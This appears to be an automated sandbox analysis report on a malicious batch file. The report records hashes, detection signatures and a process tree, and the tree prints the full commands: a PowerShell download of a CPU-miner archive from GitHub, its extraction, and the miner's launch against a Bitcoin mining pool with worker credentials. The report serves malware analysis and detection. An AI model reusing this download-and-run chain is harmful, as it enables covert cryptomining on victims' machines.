Analysis

  • max time kernel
    1799s
  • max time network
    1801s
  • platform
    windows10-1703_x64
  • resource
    win10-20230621-en
  • resource tags

    arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system
  • submitted
    30/06/2023, 15:14

General

  • Target

    win_1.bat

  • Size

    679B

  • MD5

    18842e3757e17e2733c7460f7a56d4fd

  • SHA1

    620080cdd5c84a38aac23210a35558ec8f2086e2

  • SHA256

    66cd9049152d3e9507ca112e1a0609ff8a2ecd53fc306128a0129da7d73b0d83

  • SHA512

    08e221ae077c6bbd39272ecb106d0744ef28d15c2d1cc79ff0bb201eeedd20af3e132240fcc29b797b83073a0a16beb5ca6a24d7f181385e0337466cc976a4b0

Score
10/10
upx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win_1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip', 'cpuminer-opt-win.zip')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2164
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Force -Path cpuminer-opt-win.zip -DestinationPath cpuminer-opt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3928
    • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe
      .\cpuminer-sse2.exe -a SHA256d -o stratum+tcp://btc.f2pool.com:1314 -u kris21.001 -p 21235365876986800
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4464

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    56efdb5a0f10b5eece165de4f8c9d799

    SHA1

    fa5de7ca343b018c3bfeab692545eb544c244e16

    SHA256

    6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

    SHA512

    91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    815463b0a2d786e51d93683448ae4a99

    SHA1

    9371b39f251a50c00c28351ed9322bf0af83add1

    SHA256

    0d0337049e3d80d79a65c9c6c045fc4e90569964cd270f40968e918bb4d1053b

    SHA512

    3ecf1b04063a2f71ce3825603f41c8fcdbf052008a70a6e7a2fdcfc79696189e6596c57790f76097bf6dd524981b724613c8f287e68b849a98e321a86b73cbc7

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pacpvmbw.o5r.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt-win.zip

    Filesize

    20.9MB

    MD5

    99cc95c9ce13cf3da743e1d56dabe92d

    SHA1

    e819db3b6ad4703fbc8535dadad3ad29d3cc2039

    SHA256

    df84febc2319e8e5cca7e6d0c9341d4a6824fb28646c1e435b7da58e9f9ec59b

    SHA512

    932523c4ab20c83343395498be61497dbc9ad90b3b35d3551817b94dd530b083b07d3a4b37b04c4f3d97ed1e8bb036d9d18b079a86ce46816b3a31d9eba35c02

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe

    Filesize

    2.6MB

    MD5

    d136eb0fdd0e7826893f332c7fc3f7a2

    SHA1

    1e7fd635278e954eb0ee8cb951d16e4ecf60592f

    SHA256

    993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26

    SHA512

    895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe

    Filesize

    2.6MB

    MD5

    d136eb0fdd0e7826893f332c7fc3f7a2

    SHA1

    1e7fd635278e954eb0ee8cb951d16e4ecf60592f

    SHA256

    993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26

    SHA512

    895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757

  • memory/2164-130-0x0000025EE62E0000-0x0000025EE6356000-memory.dmp

    Filesize

    472KB

  • memory/2164-145-0x0000025ECDE60000-0x0000025ECDE70000-memory.dmp

    Filesize

    64KB

  • memory/2164-127-0x0000025EE6130000-0x0000025EE6152000-memory.dmp

    Filesize

    136KB

  • memory/2164-126-0x0000025ECDE60000-0x0000025ECDE70000-memory.dmp

    Filesize

    64KB

  • memory/2164-125-0x0000025ECDE60000-0x0000025ECDE70000-memory.dmp

    Filesize

    64KB

  • memory/3928-158-0x000002DEBBF10000-0x000002DEBBF20000-memory.dmp

    Filesize

    64KB

  • memory/3928-159-0x000002DEBBF10000-0x000002DEBBF20000-memory.dmp

    Filesize

    64KB

  • memory/3928-193-0x000002DEBC0C0000-0x000002DEBC0D2000-memory.dmp

    Filesize

    72KB

  • memory/3928-206-0x000002DEBBF90000-0x000002DEBBF9A000-memory.dmp

    Filesize

    40KB

  • memory/3928-210-0x000002DEBBF10000-0x000002DEBBF20000-memory.dmp

    Filesize

    64KB

  • memory/4464-294-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-313-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-286-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-288-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-289-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-291-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-283-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-295-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-296-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-301-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-303-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-307-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-310-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-284-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-316-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-319-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-322-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-324-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-325-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-327-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-329-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-332-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-335-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-338-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-341-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-342-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-344-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB

  • memory/4464-347-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp

    Filesize

    6.5MB